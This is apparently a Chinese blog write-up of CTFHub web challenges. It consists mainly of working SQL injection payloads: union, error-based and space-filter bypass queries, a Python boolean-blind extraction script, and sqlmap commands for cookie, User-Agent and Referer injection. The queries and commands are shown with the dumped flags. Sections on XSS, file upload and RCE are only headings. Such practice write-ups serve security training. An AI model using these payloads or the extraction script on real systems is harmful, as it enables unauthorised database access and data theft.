zoukankan      html  css  js  c++  java
  • CTFHub web部分题解

    web

    SQL注入

    整数型注入

    select * from news where id=1
    

    ID: 1
    Data: ctfhub

    select * from news where id=65535 union select 1,database()
    

    ID: 1
    Data: sqli

    select * from news where id=65535 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
    

    ID: 1
    Data: news,flag

    select * from news where id=65535 union select 2,group_concat(column_name) from information_schema.columns where table_name="flag"
    

    ID: 2
    Data: flag

    select * from news where id=65535 union select 1,flag from sqli.flag
    

    ID: 1
    Data: ctfhub{b4e5f56292df47714a3505cb8e7db7ec3841564e}

    字符型注入

    select * from news where id='65535' union select 1,database()#
    ID: 1
    Data: sqli
    
    select * from news where id='65535' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#'
    ID: 1
    Data: news,flag
    
    select * from news where id='65535' union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#'
    ID: 1
    Data: flag
    
    select * from news where id='65535' union select 1,flag from sqli.flag#'
    ID: 1
    Data: ctfhub{55f091a136f1d09a3a47a0199345ec740f1b19bb}
    

    报错注入

    select * from news where id=1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'sqli&1' for key 'group_key'
    
    select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'news&1' for key 'group_key'
    
    select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'flag&1' for key 'group_key'
    
    select * from news where id=1 union select count(*),concat((select column_name from information_schema.columns where table_name="flag" limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'flag&1' for key 'group_key'
    
    select * from news where id=id=1 union select count(*),concat((select flag from sqli.flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
    查询错误: Duplicate entry 'ctfhub{1485dddbf741f771c95612e0c824f68e50e4ebaf}&1' for key 'group_key'
    

    布尔盲注

    https://blog.csdn.net/weixin_44732566/article/details/104417351

    抄的脚本

    import requests
    import time
    
    urlOPEN = 'http://challenge-ef71d5f8c726bea8.sandbox.ctfhub.com:10080/?id='
    starOperatorTime = [] 
    mark = 'query_success'
     
    def database_name():
    	name = ''
    	for j in range(1,9):
    		for i in 'sqcwertyuioplkjhgfdazxvbnm':
    			url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
    			# print(url+'%23')
    			r = requests.get(url)
    			if mark in r.text:
    				name = name+i
    				
    				print(name)
    				
    				break
    	print('database_name:',name)
    	
    		
    	
    database_name()
     
    def table_name():
        list = []
        for k in range(0,4):
            name=''
            for j in range(1,9):
                for i in 'sqcwertyuioplkjhgfdazxvbnm':
                    url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
    			    # print(url+'%23')
                    r = requests.get(url)
                    if mark in r.text:
                        name = name+i
                        break
            list.append(name)
        print('table_name:',list)
    
    #start = time.time()
    table_name()
    #stop = time.time()
    #starOperatorTime.append(stop-start)
    #print("所用的平均时间: " + str(sum(starOperatorTime)/100))
    
    def column_name():
        list = []
        for k in range(0,3): #判断表里最多有4个字段
            name=''
            for j in range(1,9): #判断一个 字段名最多有9个字符组成
                for i in 'sqcwertyuioplkjhgfdazxvbnm':
                    url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                    r=requests.get(url)
                    if mark in r.text:
                        name=name+i
                        break
            list.append(name)
        print ('column_name:',list)
    
    column_name()
    
    def get_data():
            name=''
            for j in range(1,50): #判断一个值最多有51个字符组成
                for i in range(48,126):
                    url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                    r=requests.get(url)
                    if mark in r.text:
                        name=name+chr(i)
                        print(name)
                        break
            print ('value:',name)
        
    get_data()
    

    时间盲注

    https://www.cnblogs.com/0yst3r-2046/p/12486654.html

    python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 --dbs

    available databases [4]:
    [*] information_schema [*] mysql
    [*] performance_schema [*] sqli

    python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

    Database: sqli
    [2 tables]
    +------+
    | flag |
    | news |
    +------+

    python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

    Database: sqli
    Table: flag
    [1 column]
    +--------+--------------+
    | Column | Type |
    +--------+--------------+
    | flag | varchar(100) |
    +--------+--------------+

    Database: sqli
    Table: flag
    [1 entry]
    +--------------------------------------------------+
    | flag |
    +--------------------------------------------------+
    | ctfhub{1b434bc37227050f91a3c6d89839c3d46caddc27} |
    +--------------------------------------------------+

    MySQL结构

    SQL注入之sqlmap进阶

    python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 --dbs

    available databases [4]:
    [*] information_schema [*] mysql
    [*] performance_schema [*] sqli

    Database: sqli
    [2 tables]
    +------------+
    | news |
    | yqoedxnbyv |
    +------------+

    python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -Tyqoedxnbyv --columns

    Database: sqli
    Table: yqoedxnbyv
    [1 column]
    +------------+--------------+
    | Column | Type |
    +------------+--------------+
    | xlmnukvowy | varchar(100) |
    +------------+--------------+

    python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T yqoedxnbyv --columns --dump

    Database: sqli
    Table: yqoedxnbyv
    [1 entry]
    +--------------------------------------------------+
    | xlmnukvowy |
    +--------------------------------------------------+
    | ctfhub{f1a6d4ca1299a361ac6c24a3467eacad28e33462} |
    +--------------------------------------------------+

    Cookie注入

    https://www.cnblogs.com/0yst3r-2046/p/12493132.html

    python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" --dbs --level 2
    
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli
    
    python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -D sqli --tables --level 2
    
    Database: sqli
    [2 tables]
    +------------+
    | news       |
    | ylhikalyfo |
    +------------+
    
    python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -T ylhikalyfo --columns --dump --level 2
    
    Database: sqli
    Table: ylhikalyfo
    [1 entry]
    +--------------------------------------------------+
    | purywifqom                                       |
    +--------------------------------------------------+
    | ctfhub{9fdae54dfbd16b2b8e8362efaa630d2e837ae597} |
    +--------------------------------------------------+
    

    UA注入

    python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 --dbs
    
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli
    
    python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables
    
    Database: sqli
    [2 tables]
    +------------+
    | news       |
    | stjztvvqvb |
    +------------+
    
    python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -T stjztvvqvb --columns --dump
    
    Database: sqli
    Table: stjztvvqvb
    [1 entry]
    +--------------------------------------------------+
    | wckzncyvgh                                       |
    +--------------------------------------------------+
    | ctfhub{0103df815affd10439bf1ed48520d8f39618e590} |
    +--------------------------------------------------+
    

    Refer注入

    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 --dbs
    
    available databases [4]:
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] sqli
    
    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
    
    Database: sqli
    [2 tables]
    +---------+
    | 2ews    |
    | hfuiwsi |
    +---------+
    
    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm --columns
    
    Database: sqli
    Table: hfuiwsiotm
    [1 column]
    +------------+--------------+
    | Column     | Type         |
    +------------+--------------+
    | zuzhumkhnd | varchar(100) |
    +------------+--------------+
    
    python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm -C  zuzhumkhnd --dump
    
    Database: sqli
    Table: hfuiwsiotm
    [1 entry]
    +--------------------------------------------------+
    | zuzhumkhnd                                       |
    +--------------------------------------------------+
    | ctfhub{d61711c950c746b5cc93caaf5ae33c1dfd2f1cd0} |
    +--------------------------------------------------+
    

    过滤空格

    https://www.cnblogs.com/anweilx/p/13156216.html

    65535/**/union/**/select/**/1,database()ID: 1
    Data: sqli
    
    65535/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
    
    ID: 1
    Data: zzmpdgadiv,news
    
    65535/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="zzmpdgadiv"
    
    ID: 1
    Data: bxphkegikc
    
    65535/**/union/**/select/**/1,bxphkegikc/**/from/**/zzmpdgadiv
    
    ID: 1
    Data: ctfhub{93c21f537ae0bd573387788c7c4e1bf71e64d233}
    

    XSS

    反射型

    参考链接:https://blog.csdn.net/solitudi/article/details/107544165

    文件上传

    无验证

    AntSword 中国蚁剑的下载安装配置(附下载文件)

    题解

    前端验证

    .htaccess

    MIME绕过

    00截断

    双写后缀

    文件头检查

    RCE

    eval执行

    文件包含

    php://input

    读取源代码

    远程包含

    命令注入 过滤cat 过滤空格

    过滤目录分隔符 过滤运算符 综合过滤练习

    Bypass disable_function

  • 相关阅读:
    LeetCode 169
    LeetCode 152
    LeetCode 238
    LeetCode 42
    LeetCode 11
    GDB基本调试
    小咪买东西(最大化平均值)
    codeforces 903D
    hdu 5883
    hdu 5874
  • 原文地址:https://www.cnblogs.com/qing123tian/p/13404454.html
Copyright © 2011-2022 走看看